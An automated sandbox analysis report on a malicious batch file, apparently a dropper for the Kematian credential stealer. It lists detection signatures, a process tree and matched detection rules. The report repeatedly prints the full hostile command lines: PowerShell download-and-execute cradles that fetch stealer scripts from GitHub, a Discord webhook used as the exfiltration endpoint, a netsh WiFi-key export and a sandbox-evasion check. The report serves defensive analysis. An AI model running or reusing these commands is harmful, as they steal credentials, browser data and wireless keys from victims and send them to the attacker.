
Windows Analysis Report
thegreatestexecutor.bat

Overview

General Information

Sample name: thegreatestexecutor.bat
Analysis ID: 1467094
MD5: 07f9549ba0e65bb2bd47fcf55c60a608
SHA1: 50f97f17245b1967ae322f5a72f48184db4932fa
SHA256: 84617e9c081b6b585582d2589aace5a0a7887283f9488b5a6d05906f94116f36
Tags: bat

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PowerShell ScreenShot
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Drops script or batch files to the startup folder
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Rundll32 Execution Without Parameters
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Wscript Shell Run In CommandLine
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 5172 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • powershell.exe (PID: 6660 cmdline: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • findstr.exe (PID: 7316 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7336 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • chcp.com (PID: 7352 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • findstr.exe (PID: 7372 cmdline: findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • powershell.exe (PID: 7388 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7476 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • rundll32.exe (PID: 7568 cmdline: rundll32 MD5: EF3179D498793BF4234F708D3BE28633)
    • net.exe (PID: 7608 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • net1.exe (PID: 7624 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • mshta.exe (PID: 7640 cmdline: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 8036 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • netsh.exe (PID: 3964 cmdline: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • powershell.exe (PID: 1920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 1848 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • powershell.exe (PID: 1888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: sslproxydump.pcap, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x426a70:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source | Rule | Description | Author | Strings
Source: 00000022.00000002.2017068494.000001DF1C3C0000.00000040.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x3cb95c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000022.00000002.1852694281.000001DF13ACC000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x3cbccc:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000022.00000002.1817228535.000001DF03E22000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x4b725:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000022.00000002.1852694281.000001DF13F87000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown, Strings:
  • 0x3cbce4:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source | Rule | Description | Author | Strings
Source: amsi64_7696.amsi.csv, Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Author: Joe Security
Source: amsi64_7696.amsi.csv, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0xcad8:$b2: ::FromBase64String(
  • 0xf9d5:$b2: ::FromBase64String(
  • 0x15cc9:$b2: ::FromBase64String(
  • 0x1c62e:$b2: ::FromBase64String(
  • 0xf9bb:$b3: ::UTF8.GetString(
  • 0x15ca8:$b3: ::UTF8.GetString(
  • 0x1c614:$b3: ::UTF8.GetString(
  • 0xb9dc:$s1: -join
  • 0xe8cd:$s1: -join
  • 0x15fa2:$s1: -join
  • 0x1a236:$s1: -join
  • 0x1bacb:$s1: -join
  • 0x5188:$s4: +=
  • 0x524a:$s4: +=
  • 0x9471:$s4: +=
  • 0xb58e:$s4: +=
  • 0xb878:$s4: +=
  • 0xb9be:$s4: +=
  • 0x10ced:$s4: +=
  • 0x15f95:$s4: +=
  • 0x16bcd:$s4: +=
Source: amsi64_7696.amsi.csv, Rule: MALWARE_Win_PWSH_PoshWiFiStealer, Description: Detects PowerShell PoshWiFiStealer, Author: ditekSHen, Strings:
  • 0x10a8b:$s1: netsh wlan export profile
  • 0x404d:$s2: Send-MailMessage

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
Source: Process started; Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule); Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
Source: Process started; Author: Bartlomiej Czyz, Relativity; Data: Command: rundll32, CommandLine: rundll32, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32, ProcessId: 7568, ProcessName: rundll32.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7640, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ProcessId: 7696, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7640, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex, ProcessId: 7696, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}" , ProcessId: 6660, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1920, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline", ProcessId: 3020, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\thegreatestexecutor.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6592, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0)) , ProcessId: 7640, ProcessName: mshta.exe
